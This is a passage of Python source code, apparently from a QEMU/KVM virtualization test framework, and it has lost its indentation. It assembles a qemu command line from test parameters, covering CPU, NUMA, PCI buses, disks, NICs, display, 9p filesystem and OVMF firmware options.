family=None):
if devices.has_option('cpu'):
cmd = " -cpu '%s'" % cpu_model
if vendor_id:
cmd += ",vendor=\"%s\"" % vendor_id
if flags:
if not flags.startswith(","):
cmd += ","
cmd += "%s" % flags
if family is not None:
cmd += ",family=%s" % family
return cmd
else:
return ""
def add_boot(devices, boot_order, boot_once, boot_menu, boot_strict):
if params.get('machine_type', "").startswith("arm"):
logging.warn("-boot on ARM is usually not supported, use "
"bootindex instead.")
return ""
if params.get('machine_type', "").startswith("s390"):
logging.warn("-boot on s390x only support boot strict=on")
return "-boot strict=on"
cmd = " -boot"
patterns = ["order", "once", "menu", "strict"]
options = []
for p in patterns:
pattern = "boot .*?(\[,?%s=(.*?)\]|\s+)" % p
if devices.has_option(pattern):
option = locals()["boot_%s" % p]
options.append("%s=%s" % (p, option))
if devices.has_option("boot \[a\|c\|d\|n\]"):
cmd += " %s" % boot_once
elif options:
cmd += " %s" % ",".join(options)
else:
cmd = ""
return cmd
def get_index(index):
while self.index_in_use.get(str(index)):
index += 1
return index
def add_sga(devices):
if not devices.has_option("device"):
return ""
else:
return " -device sga"
def add_watchdog(devices, device_type=None, action="reset"):
watchdog_cmd = ""
if devices.has_option("watchdog"):
if device_type:
watchdog_cmd += " -watchdog %s" % device_type
watchdog_cmd += " -watchdog-action %s" % action
return watchdog_cmd
def add_option_rom(devices, opt_rom):
if not devices.has_option("option-rom"):
return ""
return " -option-rom %s" % opt_rom
def add_smartcard(sc_chardev, sc_id):
sc_cmd = " -device usb-ccid,id=ccid0"
sc_cmd += " -chardev " + sc_chardev
sc_cmd += ",id=" + sc_id + ",name=smartcard"
sc_cmd += " -device ccid-card-passthru,chardev=" + sc_id
return sc_cmd
def add_numa_node(devices, memdev=None, mem=None,
cpus=None, nodeid=None):
"""
This function is used to add numa node to guest command line
"""
if not devices.has_option("numa"):
return ""
numa_cmd = " -numa node"
if mem is not None:
numa_cmd += ",mem=%s" % mem
elif memdev is not None:
numa_cmd += ",memdev=%s" % memdev
if cpus is not None:
cpus = map(lambda x: x.strip(), cpus.split(','))
cpus = ','.join(map(lambda x: "cpus=%s" % x, cpus))
numa_cmd += ",%s" % cpus
if nodeid is not None:
numa_cmd += ",nodeid=%s" % nodeid
return numa_cmd
def add_balloon(devices, devid=None, bus=None, use_old_format=None):
"""
This function is used to add balloon device
"""
if not devices.has_option("device") or use_old_format is True:
devices.insert(StrDev('balloon', cmdline=" -balloon virtio"))
return
machine_type = self.params.get("machine_type")
if "s390" in machine_type: # For s390x platform
model = "virtio-balloon-ccw"
bus = {'type': 'virtio-bus'}
else:
model = "virtio-balloon-pci"
dev = QDevice(model, parent_bus=bus)
if devid:
dev.set_param("id", devid)
devices.insert(dev)
def add_disable_legacy(devices, dev, dev_type):
"""
This function is used to add disable_legacy option for virtio-pci
"""
options = devices.execute_qemu("-device %s,?" % dev_type)
if "disable-legacy" in options:
value = params.get("disable_legacy", "off")
dev.set_param("disable-legacy", value)
def add_disable_modern(devices, dev, dev_type):
"""
This function is used to add disable_modern option for virtio-pci
"""
options = devices.execute_qemu("-device %s,?" % dev_type)
if "disable-modern" in options:
value = params.get("disable_modern", "on")
dev.set_param("disable-modern", value)
def _get_pci_bus(devices, params, dtype=None, virtio=False):
"""
Get device parent pci bus by dtype
:param devices: DevContainer object
:param params: test params
:param dtype: device type
:param virtio: is it a virtio device (bool type)
:return: return QPCIBus object.
"""
pci_bus = {'aobject': params.get('pci_bus', 'pci.0')}
if params.get("machine_type") != "q35":
return pci_bus
if dtype and "%s_pci_bus" % dtype in params:
return {"aobject": params["%s_pci_bus" % dtype]}
pcic = virtio and "x3130-upstream" or "pci-bridge"
devices = [_ for _ in devices if isinstance(_, QDevice)]
devices = [_ for _ in devices if _.get_param('driver') == pcic]
try:
return {"aobject": devices[0].get_qid()}
except Exception:
pass
return pci_bus
# End of command line option wrappers
# If nothing changed and devices exists, return imediatelly
if (name is None and params is None and root_dir is None and
self.devices is not None):
return self.devices
if name is None:
name = self.name
if params is None:
params = self.params
if root_dir is None:
root_dir = self.root_dir
have_ahci = False
have_virtio_scsi = False
virtio_scsi_pcis = []
pci_bus = {'aobject': params.get('pci_bus', 'pci.0')}
# init value by default.
# PCI addr 0,1,2 are taken by PCI/ISA/IDE bridge and the GPU.
self.pci_addr_list = [0, 1, 2]
# Clone this VM using the new params
vm = self.clone(name, params, root_dir, copy_state=True)
# global counters
ide_bus = 0
ide_unit = 0
vdisk = 0
scsi_disk = 0
self.last_boot_index = 0
if params.get("kernel"):
self.last_boot_index = 1
qemu_binary = utils_misc.get_qemu_binary(params)
self.qemu_binary = qemu_binary
self.qemu_version = commands.getoutput("%s -version" %
qemu_binary).split(',')[0]
support_cpu_model = commands.getoutput("%s -cpu \\?" % qemu_binary)
self.last_driver_index = 0
# init the dict index_in_use
for key in params.keys():
if 'drive_index' in key:
self.index_in_use[params.get(key)] = True
cmd = ""
# Enable the use of glibc's malloc_perturb feature
if params.get("malloc_perturb", "no") == "yes":
cmd += "MALLOC_PERTURB_=1 "
# Set the X11 display parameter if requested
if params.get("x11_display"):
cmd += "DISPLAY=%s " % params.get("x11_display")
if params.get("qemu_audio_drv"):
cmd += "QEMU_AUDIO_DRV=%s " % params.get("qemu_audio_drv")
# Add command prefix for qemu-kvm. like taskset, valgrind and so on
if params.get("qemu_command_prefix"):
qemu_command_prefix = params.get("qemu_command_prefix")
cmd += "%s " % qemu_command_prefix
# Add numa memory cmd to pin guest memory to numa node
if params.get("numa_node"):
numa_node = int(params.get("numa_node"))
if len(utils_misc.get_node_cpus()) < int(params.get("smp", 1)):
logging.info("Skip pinning, no enough nodes")
elif numa_node < 0:
n = utils_misc.NumaNode(numa_node)
cmd += "numactl -m %s " % n.node_id
else:
n = numa_node - 1
cmd += "numactl -m %s " % n
# Start constructing devices representation
devices = qcontainer.DevContainer(qemu_binary, self.name,
params.get('strict_mode'),
params.get(
'workaround_qemu_qmp_crash'),
params.get('allow_hotplugged_vm'))
StrDev = qdevices.QStringDevice
QDevice = qdevices.QDevice
devices.insert(StrDev('PREFIX', cmdline=cmd))
# Add the qemu binary
devices.insert(StrDev('qemu', cmdline=qemu_binary))
devices.insert(StrDev('-S', cmdline="-S"))
# Add the VM's name
devices.insert(StrDev('vmname', cmdline=add_name(name)))
qemu_sandbox = params.get("qemu_sandbox")
if qemu_sandbox == "on":
devices.insert(
StrDev(
'qemu_sandbox',
cmdline=process_sandbox(
devices,
"add")))
elif qemu_sandbox == "off":
devices.insert(
StrDev(
'qemu_sandbox',
cmdline=process_sandbox(
devices,
"rem")))
del qemu_sandbox
devs = devices.machine_by_params(params)
devices.insert(devs)
# no automagic devices please
defaults = params.get("defaults", "no")
if devices.has_option("nodefaults") and defaults != "yes":
devices.insert(StrDev('nodefaults', cmdline=" -nodefaults"))
# nodefconfig please
if params.get("defconfig", "yes") == "no":
devices.insert(StrDev('nodefconfig', cmdline=" -nodefconfig"))
vga = params.get("vga")
if vga:
if vga != 'none':
devices.insert(StrDev('VGA-%s' % vga,
cmdline=add_vga(vga),
parent_bus={'aobject': 'pci.0'}))
if vga == 'qxl':
qxl_dev_nr = int(params.get("qxl_dev_nr", 1))
if qxl_dev_nr > 1:
addr = int(params.get("qxl_base_addr", 29))
cmdline = add_qxl(qxl_dev_nr, addr)
devices.insert(StrDev('qxl', cmdline=cmdline))
else:
devices.insert(StrDev('VGA-none', cmdline=add_vga(vga)))
elif params.get('defaults', 'no') != 'no': # by default add cirrus
devices.insert(StrDev('VGA-cirrus',
cmdline=add_vga(vga),
parent_bus={'aobject': 'pci.0'}))
# When old scsi fmt is used, new device with lowest pci_addr is created
devices.hook_fill_scsi_hbas(params)
# Additional PCI RC/switch/bridges
for pcic in params.objects("pci_controllers"):
devs = devices.pcic_by_params(pcic, params.object_params(pcic))
devices.insert(devs)
# -soundhw addresses are always the lowest after scsi
soundhw = params.get("soundcards")
if soundhw:
parent_bus = _get_pci_bus(devices, params, "soundcard")
if not devices.has_option('device') or soundhw == "all":
for sndcard in ('AC97', 'ES1370', 'intel-hda'):
# Add all dummy PCI devices and the actuall command below
devices.insert(StrDev("SND-%s" % sndcard,
parent_bus=parent_bus))
devices.insert(StrDev('SoundHW',
cmdline="-soundhw %s" % soundhw))
else:
# TODO: Use QDevices for this and set the addresses properly
for sound_device in soundhw.split(","):
if "hda" in sound_device:
devices.insert(QDevice('intel-hda',
parent_bus=parent_bus))
devices.insert(QDevice('hda-duplex'))
elif sound_device in ["es1370", "ac97"]:
devices.insert(QDevice(sound_device.upper(),
parent_bus=parent_bus))
else:
devices.insert(QDevice(sound_device,
parent_bus=parent_bus))
# Add monitors
catch_monitor = params.get("catch_monitor")
if catch_monitor:
if catch_monitor not in params.get("monitors"):
params["monitors"] += " %s" % catch_monitor
for monitor_name in params.objects("monitors"):
monitor_params = params.object_params(monitor_name)
monitor_filename = qemu_monitor.get_monitor_filename(vm,
monitor_name)
if monitor_params.get("monitor_type") == "qmp":
cmd = add_qmp_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('QMP-%s' % monitor_name, cmdline=cmd))
else:
cmd = add_human_monitor(devices, monitor_name,
monitor_filename)
devices.insert(StrDev('HMP-%s' % monitor_name, cmdline=cmd))
# Add pvpanic device
if params.get("enable_pvpanic") == "yes":
if not devices.has_device("pvpanic"):
logging.warn("pvpanic device is not supportted")
else:
pvpanic_params = {"backend": "pvpanic"}
ioport = params.get("ioport_pvpanic")
if ioport:
pvpanic_params["ioport"] = ioport
pvpanic_dev = qdevices.QCustomDevice("device",
params=pvpanic_params,
backend="backend")
pvpanic_dev.set_param("id", utils_misc.generate_random_id(),
dynamic=True)
devices.insert(pvpanic_dev)
# Add serial console redirection
for serial in params.objects("serials"):
serial_filename = vm.get_serial_console_filename(serial)
cmd = add_serial(devices, serial, serial_filename)
devices.insert(StrDev('SER-%s' % serial, cmdline=cmd))
# Add virtio_serial ports
if not devices.has_device("virtconsole"):
logging.warn("virt-console/serialport devices are not supported")
else:
no_virtio_serial_pcis = 0
no_virtio_ports = 0
virtio_port_spread = int(params.get('virtio_port_spread', 2))
parent_bus = _get_pci_bus(devices, params, "vio_port", True)
for port_name in params.objects("virtio_ports"):
port_params = params.object_params(port_name)
bus = params.get('virtio_port_bus', False)
if bus is not False: # Manually set bus
bus = int(bus)
elif not virtio_port_spread:
# bus not specified, let qemu decide
pass
elif not no_virtio_ports % virtio_port_spread:
# Add new vio-pci every n-th port. (Spread ports)
bus = no_virtio_serial_pcis
else: # Port not overriden, use last vio-pci
bus = no_virtio_serial_pcis - 1
if bus < 0: # First bus
bus = 0
# Add virtio_serial_pcis
# Multiple virtio console devices can't share a
# single virtio-serial-pci bus. So add a virtio-serial-pci bus
# when the port is a virtio console.
if (port_params.get('virtio_port_type') == 'console' and
params.get('virtio_port_bus') is None):
if params.get('machine_type').startswith("arm64-mmio"):
dev = QDevice('virtio-serial-device')
else:
dev = QDevice(
'virtio-serial-pci', parent_bus=parent_bus)
dev.set_param('id',
'virtio_serial_pci%d' % no_virtio_serial_pcis)
devices.insert(dev)
no_virtio_serial_pcis += 1
for i in range(no_virtio_serial_pcis, bus + 1):
if params.get('machine_type').startswith("arm64-mmio"):
dev = QDevice('virtio-serial-device')
else:
dev = QDevice(
'virtio-serial-pci', parent_bus=parent_bus)
dev.set_param('id', 'virtio_serial_pci%d' % i)
devices.insert(dev)
no_virtio_serial_pcis += 1
if bus is not False:
bus = "virtio_serial_pci%d.0" % bus
# Add actual ports
char_params = port_params.copy()
backend = port_params.get("virtio_port_chardev", "socket")
port_file = self.get_virtio_port_filename(port_name)
char_params.update({"backend": backend,
"server": "yes",
"nowait": "yes",
"name": port_name,
"path": port_file})
char_dev = add_chardev(devices, char_params)
virtio_port = add_virtio_port(devices,
char_dev,
port_params,
port_name,
bus,
no_virtio_ports)
devices.insert([char_dev, virtio_port])
no_virtio_ports += 1
# Add virtio-rng devices
for virtio_rng in params.objects("virtio_rngs"):
parent_bus = _get_pci_bus(devices, params, "vio_rng", True)
virtio_rng_params = params.object_params(virtio_rng)
add_virtio_rng(devices, virtio_rng_params, parent_bus)
# Add logging
devices.insert(StrDev('isa-log', cmdline=add_log_seabios(devices)))
if params.get("anaconda_log", "no") == "yes":
parent_bus = _get_pci_bus(devices, params, None, True)
add_log_anaconda(devices, parent_bus)
# Add USB controllers
usbs = params.objects("usbs")
if not devices.has_option("device"):
usbs = ("oldusb",) # Old qemu, add only one controller '-usb'
for usb_name in usbs:
usb_params = params.object_params(usb_name)
for dev in devices.usbc_by_params(usb_name, usb_params):
devices.insert(dev)
for iothread in params.get("iothreads", "").split():
cmd = "-object iothread,"
iothread_id = params.get("%s_id" % iothread.strip())
if not iothread_id:
iothread_id = iothread.strip()
cmd += "id=%s" % iothread_id
devices.insert(StrDev("IOthread_%s" % iothread_id, cmdline=cmd))
# Add images (harddrives)
for image_name in params.objects("images"):
# FIXME: Use qemu_devices for handling indexes
image_params = params.object_params(image_name)
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
self.last_driver_index = get_index(self.last_driver_index)
index = str(self.last_driver_index)
self.last_driver_index += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(self.last_boot_index)
self.last_boot_index += 1
image_boot = "unused"
image_bootindex = image_params.get('bootindex',
image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if self.last_boot_index > 0:
image_boot = False
self.last_boot_index += 1
if ("virtio" in image_params.get("drive_format", "") or
"virtio" in image_params.get("scsi_hba", "")):
parent_bus = _get_pci_bus(devices, params, "disk", True)
else:
parent_bus = _get_pci_bus(devices, params, "disk", False)
devs = devices.images_define_by_params(image_name, image_params,
'disk', index, image_boot,
image_bootindex,
pci_bus=parent_bus)
for _ in devs:
devices.insert(_)
# Networking
redirs = []
for redir_name in params.objects("redirs"):
redir_params = params.object_params(redir_name)
guest_port = int(redir_params.get("guest_port"))
host_port = vm.redirs.get(guest_port)
redirs += [(host_port, guest_port)]
iov = 0
for nic in vm.virtnet:
nic_params = params.object_params(nic.nic_name)
if nic_params.get('pci_assignable') == "no":
script = nic_params.get("nic_script")
downscript = nic_params.get("nic_downscript")
vhost = nic_params.get("vhost")
vhostforce = nic_params.get("vhostforce")
script_dir = data_dir.get_data_dir()
if script:
script = utils_misc.get_path(script_dir, script)
if downscript:
downscript = utils_misc.get_path(script_dir, downscript)
# setup nic parameters as needed
# add_netdev if netdev_id not set
nic = vm.add_nic(**dict(nic))
# gather set values or None if unset
vlan = int(nic.get('vlan'))
netdev_id = nic.get('netdev_id')
device_id = nic.get('device_id')
mac = nic.get('mac')
nic_model = nic.get("nic_model")
nic_extra = nic.get("nic_extra_params")
bootindex = nic_params.get("bootindex")
netdev_extra = nic.get("netdev_extra_params")
bootp = nic.get("bootp")
add_queues = nic_params.get("add_queues", "no") == "yes"
add_tapfd = nic_params.get("add_tapfd", "no") == "yes"
add_vhostfd = nic_params.get("add_vhostfd", "no") == "yes"
helper = nic_params.get("helper")
tapfds_len = int(nic_params.get("tapfds_len", -1))
vhostfds_len = int(nic_params.get("vhostfds_len", -1))
if nic.get("tftp"):
tftp = utils_misc.get_path(root_dir, nic.get("tftp"))
else:
tftp = None
nettype = nic.get("nettype", "bridge")
# don't force conversion add_nic()/add_net() optional parameter
if 'tapfds' in nic:
tapfds = nic.tapfds
else:
tapfds = None
if 'vhostfds' in nic:
vhostfds = nic.vhostfds
else:
vhostfds = None
ifname = nic.get('ifname')
queues = nic.get("queues", 1)
# specify the number of MSI-X vectors that the card should have;
# this option currently only affects virtio cards
if nic_params.get("enable_msix_vectors") == "yes":
if "vectors" in nic:
vectors = nic.vectors
else:
vectors = 2 * int(queues) + 2
else:
vectors = None
# Setup some exclusive parameters if we are not running a
# negative test.
if nic_params.get("run_invalid_cmd_nic") != "yes":
if vhostfds or tapfds or add_queues:
helper = None
if vhostfds or tapfds:
add_queues = None
add_vhostfd = None
add_tapfd = None
else:
if vhostfds and vhostfds_len > -1:
vhostfd_list = re.split(":", vhostfds)
if vhostfds_len < len(vhostfd_list):
vhostfds = ":".join(vhostfd_list[:vhostfds_len])
if tapfds and tapfds_len > -1:
tapfd_list = re.split(":", tapfds)
if tapfds_len < len(tapfd_list):
tapfds = ":".join(tapfd_list[:tapfds_len])
# Handle the '-net nic' part
virtio = "virtio" in nic_model
parent_bus = _get_pci_bus(devices, params, "nic", virtio)
add_nic(devices, vlan, nic_model, mac,
device_id, netdev_id, nic_extra,
nic_params.get("nic_pci_addr"),
bootindex, queues, vectors, parent_bus,
nic_params.get("ctrl_mac_addr"))
# Handle the '-net tap' or '-net user' or '-netdev' part
cmd, cmd_nd = add_net(devices, vlan, nettype, ifname, tftp,
bootp, redirs, netdev_id, netdev_extra,
tapfds, script, downscript, vhost,
queues, vhostfds, add_queues, helper,
add_tapfd, add_vhostfd, vhostforce)
if vhostfds is None:
vhostfds = ""
if tapfds is None:
tapfds = ""
net_params = {'netdev_id': netdev_id,
'vhostfd': vhostfds.split(":")[0],
'vhostfds': vhostfds,
'tapfd': tapfds.split(":")[0],
'tapfds': tapfds,
'ifname': ifname,
}
for i, (host_port, guest_port) in enumerate(redirs):
net_params["host_port%d" % i] = host_port
net_params["guest_port%d" % i] = guest_port
# TODO: Is every NIC a PCI device?
devices.insert(StrDev("NET-%s" % nettype, cmdline=cmd,
params=net_params, cmdline_nd=cmd_nd))
else:
device_driver = nic_params.get("device_driver", "pci-assign")
pci_id = vm.pa_pci_ids[iov]
pci_id = ":".join(pci_id.split(":")[1:])
add_pcidevice(devices, pci_id, params=nic_params,
device_driver=device_driver,
pci_bus=pci_bus)
iov += 1
# Add Memory devices
add_memorys(devices, params)
smp = int(params.get("smp", 0))
mem = int(params.get("mem", 0))
vcpu_maxcpus = int(params.get("vcpu_maxcpus", 0))
vcpu_sockets = int(params.get("vcpu_sockets", 0))
vcpu_cores = int(params.get("vcpu_cores", 0))
vcpu_threads = int(params.get("vcpu_threads", 0))
# Some versions of windows don't support more than 2 sockets of cpu,
# here is a workaround to make all windows use only 2 sockets.
if (vcpu_sockets and vcpu_sockets > 2 and
params.get("os_type") == 'windows'):
vcpu_sockets = 2
amd_vendor_string = params.get("amd_vendor_string")
if not amd_vendor_string:
amd_vendor_string = "AuthenticAMD"
if amd_vendor_string == utils_misc.get_cpu_vendor():
# AMD cpu do not support multi threads.
if params.get("test_negative_thread", "no") != "yes":
vcpu_threads = 1
txt = "Set vcpu_threads to 1 for AMD cpu."
logging.warn(txt)
if smp == 0 or vcpu_sockets == 0:
vcpu_cores = vcpu_cores or 1
vcpu_threads = vcpu_threads or 1
if smp and vcpu_sockets == 0:
vcpu_sockets = int(smp / (vcpu_cores * vcpu_threads)) or 1
else:
vcpu_sockets = vcpu_sockets or 1
if smp == 0:
smp = vcpu_cores * vcpu_threads * vcpu_sockets
else:
if vcpu_cores == 0:
vcpu_threads = vcpu_threads or 1
vcpu_cores = int(smp / (vcpu_sockets * vcpu_threads)) or 1
else:
vcpu_threads = int(smp / (vcpu_cores * vcpu_sockets)) or 1
self.cpuinfo.smp = smp
self.cpuinfo.maxcpus = vcpu_maxcpus or smp
self.cpuinfo.cores = vcpu_cores
self.cpuinfo.threads = vcpu_threads
self.cpuinfo.sockets = vcpu_sockets
devices.insert(StrDev('smp', cmdline=add_smp(devices)))
numa_total_cpus = 0
numa_total_mem = 0
for numa_node in params.objects("guest_numa_nodes"):
numa_params = params.object_params(numa_node)
numa_mem = numa_params.get("numa_mem")
numa_cpus = numa_params.get("numa_cpus")
numa_nodeid = numa_params.get("numa_nodeid")
numa_memdev = numa_params.get("numa_memdev")
if numa_mem is not None:
numa_total_mem += int(numa_mem)
if numa_cpus is not None:
numa_total_cpus += len(utils_misc.cpu_str_to_list(numa_cpus))
cmdline = add_numa_node(devices, numa_memdev,
numa_mem, numa_cpus, numa_nodeid)
devices.insert(StrDev('numa', cmdline=cmdline))
if params.get("numa_consistency_check_cpu_mem", "no") == "yes":
if (numa_total_cpus > int(smp) or numa_total_mem > int(mem) or
len(params.objects("guest_numa_nodes")) > int(smp)):
logging.debug("-numa need %s vcpu and %s memory. It is not "
"matched the -smp and -mem. The vcpu number "
"from -smp is %s, and memory size from -mem is"
" %s" % (numa_total_cpus, numa_total_mem, smp,
mem))
raise virt_vm.VMDeviceError("The numa node cfg can not fit"
" smp and memory cfg.")
cpu_model = params.get("cpu_model")
use_default_cpu_model = True
if cpu_model:
use_default_cpu_model = False
for model in re.split(",", cpu_model):
model = model.strip()
if model not in support_cpu_model:
continue
cpu_model = model
break
else:
cpu_model = model
logging.error("Non existing CPU model %s will be passed "
"to qemu (wrong config or negative test)", model)
if use_default_cpu_model:
cpu_model = params.get("default_cpu_model")
if cpu_model:
vendor = params.get("cpu_model_vendor")
flags = params.get("cpu_model_flags")
family = params.get("cpu_family")
self.cpuinfo.model = cpu_model
self.cpuinfo.vendor = vendor
self.cpuinfo.flags = flags
self.cpuinfo.family = family
cmd = add_cpu_flags(devices, cpu_model, flags, vendor, family)
devices.insert(StrDev('cpu', cmdline=cmd))
# Add cdroms
for cdrom in params.objects("cdroms"):
image_params = params.object_params(cdrom)
# FIXME: Use qemu_devices for handling indexes
if image_params.get("boot_drive") == "no":
continue
if params.get("index_enable") == "yes":
drive_index = image_params.get("drive_index")
if drive_index:
index = drive_index
else:
self.last_driver_index = get_index(self.last_driver_index)
index = str(self.last_driver_index)
self.last_driver_index += 1
else:
index = None
image_bootindex = None
image_boot = image_params.get("image_boot")
if not re.search("boot=on\|off", devices.get_help_text(),
re.MULTILINE):
if image_boot in ['yes', 'on', True]:
image_bootindex = str(self.last_boot_index)
self.last_boot_index += 1
image_boot = "unused"
image_bootindex = image_params.get(
'bootindex', image_bootindex)
else:
if image_boot in ['yes', 'on', True]:
if self.last_boot_index > 0:
image_boot = False
self.last_boot_index += 1
iso = image_params.get("cdrom")
if iso or image_params.get("cdrom_without_file") == "yes":
if ("virtio" in image_params.get("driver_format", "") or
"virtio" in image_params.get("scsi_hba", "")):
parent_bus = _get_pci_bus(devices, params, "cdrom", True)
else:
parent_bus = _get_pci_bus(devices, params, "cdrom", False)
devs = devices.cdroms_define_by_params(cdrom, image_params,
'cdrom', index,
image_boot,
image_bootindex,
pci_bus=parent_bus)
for _ in devs:
devices.insert(_)
# We may want to add {floppy_otps} parameter for -fda, -fdb
# {fat:floppy:}/path/. However vvfat is not usually recommended.
for floppy_name in params.objects('floppies'):
image_params = params.object_params(floppy_name)
# TODO: Unify image, cdrom, floppy params
image_params['drive_format'] = 'floppy'
image_params[
'image_readonly'] = image_params.get("floppy_readonly",
"no")
# Use the absolute patch with floppies (pure *.vfd)
image_params['image_raw_device'] = 'yes'
image_params['image_name'] = utils_misc.get_path(
data_dir.get_data_dir(),
image_params["floppy_name"])
image_params['image_format'] = None
devs = devices.images_define_by_params(floppy_name, image_params,
media='')
for _ in devs:
devices.insert(_)
# Add usb devices
for usb_dev in params.objects("usb_devices"):
usb_dev_params = params.object_params(usb_dev)
devices.insert(devices.usb_by_params(usb_dev, usb_dev_params))
tftp = params.get("tftp")
if tftp:
tftp = utils_misc.get_path(data_dir.get_data_dir(), tftp)
devices.insert(StrDev('tftp', cmdline=add_tftp(devices, tftp)))
bootp = params.get("bootp")
if bootp:
devices.insert(StrDev('bootp',
cmdline=add_bootp(devices, bootp)))
kernel = params.get("kernel")
if kernel:
kernel = utils_misc.get_path(data_dir.get_data_dir(), kernel)
devices.insert(StrDev('kernel',
cmdline=add_kernel(kernel)))
kernel_params = params.get("kernel_params")
if kernel_params:
cmd = add_kernel_cmdline(kernel_params)
devices.insert(StrDev('kernel-params', cmdline=cmd))
initrd = params.get("initrd")
if initrd:
initrd = utils_misc.get_path(data_dir.get_data_dir(), initrd)
devices.insert(StrDev('initrd',
cmdline=add_initrd(initrd)))
for host_port, guest_port in redirs:
cmd = add_tcp_redir(devices, host_port, guest_port)
devices.insert(StrDev('tcp-redir', cmdline=cmd))
cmd = ""
if params.get("display") == "vnc":
vnc_extra_params = params.get("vnc_extra_params")
vnc_password = params.get("vnc_password", "no")
cmd += add_vnc(self.vnc_port, vnc_password, vnc_extra_params)
elif params.get("display") == "sdl":
cmd += add_sdl(devices)
elif params.get("display") == "nographic":
cmd += add_nographic()
elif params.get("display") == "spice":
if params.get("rhel5_spice"):
spice_params = params.get("spice_params")
cmd += add_spice_rhel5(devices, spice_params)
else:
spice_keys = (
"spice_port", "spice_password", "spice_addr", "spice_ssl",
"spice_tls_port", "spice_tls_ciphers", "spice_gen_x509",
"spice_x509_dir", "spice_x509_prefix",
"spice_x509_key_file", "spice_x509_cacert_file",
"spice_x509_key_password", "spice_x509_secure",
"spice_x509_cacert_subj", "spice_x509_server_subj",
"spice_secure_channels", "spice_image_compression",
"spice_jpeg_wan_compression",
"spice_zlib_glz_wan_compression", "spice_streaming_video",
"spice_agent_mouse", "spice_playback_compression",
"spice_ipv4", "spice_ipv6", "spice_x509_cert_file",
"disable_copy_paste", "spice_seamless_migration",
"listening_addr"
)
for skey in spice_keys:
value = params.get(skey, None)
if value:
self.spice_options[skey] = value
cmd += add_spice()
if cmd:
devices.insert(StrDev('display', cmdline=cmd))
if params.get("uuid") == "random":
cmd = add_uuid(vm.uuid)
devices.insert(StrDev('uuid', cmdline=cmd))
elif params.get("uuid"):
cmd = add_uuid(params.get("uuid"))
devices.insert(StrDev('uuid', cmdline=cmd))
if params.get("testdev") == "yes":
cmd = add_testdev(devices, vm.get_testlog_filename())
devices.insert(StrDev('testdev', cmdline=cmd))
if params.get("isa_debugexit") == "yes":
iobase = params.get("isa_debugexit_iobase")
iosize = params.get("isa_debugexit_iosize")
cmd = add_isa_debug_exit(devices, iobase, iosize)
devices.insert(StrDev('isa_debugexit', cmdline=cmd))
if params.get("disable_hpet") == "yes":
devices.insert(StrDev('nohpet', cmdline=add_no_hpet(devices)))
devices.insert(StrDev('rtc', cmdline=add_rtc(devices)))
if devices.has_option("boot"):
boot_order = params.get("boot_order", "cdn")
boot_once = params.get("boot_once", "c")
boot_menu = params.get("boot_menu", "off")
boot_strict = params.get("boot_strict", "off")
cmd = add_boot(
devices, boot_order, boot_once, boot_menu, boot_strict)
devices.insert(StrDev('bootmenu', cmdline=cmd))
p9_export_dir = params.get("9p_export_dir")
if p9_export_dir:
cmd = " -fsdev"
p9_fs_driver = params.get("9p_fs_driver")
if p9_fs_driver == "handle":
cmd += " handle,id=local1,path=" + p9_export_dir
elif p9_fs_driver == "proxy":
cmd += " proxy,id=local1,socket="
else:
p9_fs_driver = "local"
cmd += " local,id=local1,path=" + p9_export_dir
# security model is needed only for local fs driver
if p9_fs_driver == "local":
p9_security_model = params.get("9p_security_model")
if not p9_security_model:
p9_security_model = "none"
cmd += ",security_model=" + p9_security_model
elif p9_fs_driver == "proxy":
p9_socket_name = params.get("9p_socket_name")
if not p9_socket_name:
raise virt_vm.VMImageMissingError("Socket name not "
"defined")
cmd += p9_socket_name
p9_immediate_writeout = params.get("9p_immediate_writeout")
if p9_immediate_writeout == "yes":
cmd += ",writeout=immediate"
p9_readonly = params.get("9p_readonly")
if p9_readonly == "yes":
cmd += ",readonly"
devices.insert(StrDev('fsdev', cmdline=cmd))
parent_bus = _get_pci_bus(devices, params, 'vio_9p', True)
dev = QDevice('virtio-9p-pci', parent_bus=parent_bus)
dev.set_param('fsdev', 'local1')
dev.set_param('mount_tag', 'autotest_tag')
devices.insert(dev)
extra_params = params.get("extra_params")
if extra_params:
devices.insert(StrDev('extra', cmdline=extra_params))
bios_path = params.get("bios_path")
if bios_path:
devices.insert(StrDev('bios', cmdline="-bios %s" % bios_path))
if params.get('ovmf_path'):
if not os.path.exists(params['ovmf_path']):
raise exceptions.TestError("The OVMF path is not exist. Maybe you"
" need to install related packages.")
current_data_dir = data_dir.get_data_dir()
ovmf_code_filename = params["ovmf_code_filename"]
ovmf_code_path = os.path.join(params['ovmf_path'],
ovmf_code_filename)
ovmf_vars_filename = params["ovmf_vars_filename"]
ovmf_vars_src_path = os.path.join(params['ovmf_path'],
ovmf_vars_filename)
# To ignore the influence from backends
path = storage.get_image_filename_filesytem(params,
current_data_dir)
ovmf_vars_path = "%s.fd" % path
dev = qdevices.QDrive('ovmf_code', use_device=False)
dev.set_param("if", "pflash")
dev.set_param("format", "raw")
dev.set_param("readonly", "on")
dev.set_param("file", ovmf_code_path)
devices.insert(dev)
if (not os.path.exists(ovmf_vars_path) or
params.get("restore_ovmf_vars") == "yse"):
cp_cmd = "cp -f %s %s" % (ovmf_vars_src_path, ovmf_vars_path)
process.system(cp_cmd)
dev = qdevices.QDrive('ovmf_vars', use_device=False)
dev.set_param("if", "pflash")
dev.set_param("format", "raw")
dev.set_param("file", ovmf_vars_path)
devices.insert(dev)
disable_kvm_option = ""
if (devices.has_option("no-kvm")):
disable_kvm_option = "-no-kvm"
enable_kvm_option = ""
if (devices.has_option("enable-kvm")):
enable_kvm_option = "-enable-kvm"
if (params.get("disable_kvm", "no") == "yes"):
params["enable_kvm"] = "no"
if (params.get("enable_kvm", "yes") == "no"):
devices.insert(StrDev('nokvm', cmdline=disable_kvm_option))
logging.debug("qemu will run in TCG mode")
else:
devices.insert(StrDev('kvm', cmdline=enable_kvm_option))
logging.debug("qemu will run in KVM mode")
self.no_shutdown = (devices.has_option("no-shutdown") and
params.get("disable_shutdown", "no") == "yes")
if self.no_shutdown:
devices.insert(StrDev('noshutdown', cmdline="-no-shutdown"))
user_runas = params.get("user_runas")
if devices.has_option("runas") and user_runas:
